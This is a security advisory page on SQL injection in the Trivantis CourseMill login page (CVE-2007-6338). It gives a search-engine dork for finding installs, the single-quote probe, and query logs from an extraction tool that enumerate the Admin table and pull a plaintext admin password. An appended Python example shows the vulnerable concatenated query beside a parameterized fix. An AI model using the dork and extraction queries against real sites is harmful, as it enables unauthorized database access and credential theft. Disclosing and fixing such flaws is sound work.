| Reporter | Title | Published | Views |
|---|---|---|---|
| nessus | QuickTime < 7.3.1 Multiple Vulnerabilities | 14 Dec 2007 00:00 | – |
| cve | CVE-2007-6338 | 15 Dec 2007 01:00 | – |
| cvelist | CVE-2007-6338 | 15 Dec 2007 01:00 | – |
| euvd | EUVD-2007-6305 | 7 Oct 2025 00:30 | – |
| nvd | CVE-2007-6338 | 15 Dec 2007 01:46 | – |
| prion | Sql injection | 15 Dec 2007 01:46 | – |
| securityvulns | + Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338 | 16 Dec 2007 00:00 | – |
| securityvulns | Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 16 Dec 2007 00:00 | – |
| seebug | FreeWebshop SQL injection vulnerability | 18 Dec 2007 00:00 | – |

`+==================================================================================================+
+ Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338 +
+==================================================================================================+
DISCOVERED BY:
==============
sasquatch of SecureState - [email protected]
HOMEPAGE:
=========
www.securestate.com
AFFECTED AREA:
==============
The username field on the login page is susceptible to SQL injection...
http://www.website.com/coursemill/userlogin.jsp seems to be the default login page.
Impact: Full data dump of underlying database ---> Username/Passwords ~~~> ???
username: '
password: test
An unrecoverable error has occurred.
Please report this message to your system administrator.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Exit
©2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved.
EXPLOITATION:
=============
Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database.
This is a free tool available from http://axf.watchfire.com/extensions/exploiter.aspx
The logins are unencrypted and stored in the "Admin" table. Column names are: ID, LastLogin, OrgId, Password.
This was found during a penetration test and was not tested as to whether or not further exploitation from inside the application is possible.
CONFIRMED AGAINST:
==================
CourseMill Enterprise v.4.1 SP4 (4527) (http://www.trivantis.com/products/coursemill.html)
EXAMPLE GOOGLEDORK:
===================
"Trivantis and CourseMill are registered trademarks of Trivantis"
VENDOR INFORMATION:
===================
Trivantis Corporation
311 Elm Street Suite 200
Cincinnati, OH 45202
877-929-0188
513-929-0188
http://www.trivantis.com
Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us.
Sample Query Logs from Exploiter Beta:
======================================
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin')
Column found: table=Admin, column=ID
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID'
Column found: table=Admin, column=LastLogin
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin'
Column found: table=Admin, column=OrgId
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'OrgId'
Column found: table=Admin, column=Password
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'Password'
Extracting records for table=Admin...
Exploit method is now Convert
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT ID)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT LastLogin)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT OrgId)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT Password)) FROM Admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(ID,'')))) FROM Admin
Value found: table=Admin, column=ID, value=admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(LastLogin,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=LastLogin, value=Oct 7 2007 2:45AM
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(OrgId,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=OrgId, value=
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(Password,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=Password, value=admin
Etc...
and proceeds to dump the entire database...
`
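
The failure mode reported above, next to its fix, as an added example (not part of the original advisory and not CourseMill code). Python with an in-memory SQLite database stands in for the JSP/database stack; the Salt and PwHash columns, the function names and the sample passphrase are assumptions made for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

def hash_password(password, salt):
    # Salted, slow hash instead of the plaintext column the advisory describes.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

def make_db():
    """In-memory stand-in for the credential table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Admin (ID TEXT PRIMARY KEY, Salt BLOB, PwHash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO Admin VALUES (?, ?, ?)",
               ("admin", salt, hash_password("constructed-passphrase", salt)))
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern: the username is spliced into the SQL text."""
    sql = "SELECT Salt, PwHash FROM Admin WHERE ID = '" + username + "'"
    row = db.execute(sql).fetchone()  # a lone ' reaches the SQL parser here
    return row is not None and hmac.compare_digest(row[1], hash_password(password, row[0]))

def login_parameterized(db, username, password):
    """Hardened pattern: bound parameter, generic failure, no driver text returned."""
    try:
        row = db.execute("SELECT Salt, PwHash FROM Admin WHERE ID = ?",
                         (username,)).fetchone()
    except sqlite3.Error:
        return False  # log server-side; never echo the database message to the client
    if row is None:
        return False
    return hmac.compare_digest(row[1], hash_password(password, row[0]))

def probe(db, login, username):
    """Return 'error: ...' if the input broke the SQL statement, else the login result."""
    try:
        return login(db, username, "test")
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", probe(db, login_concatenated, "'"))
    print("parameterized:", probe(db, login_parameterized, "'"))
```

With the username `'` from the advisory, the concatenated query fails in the SQL parser, while the bound-parameter version treats the quote as data and simply rejects the login.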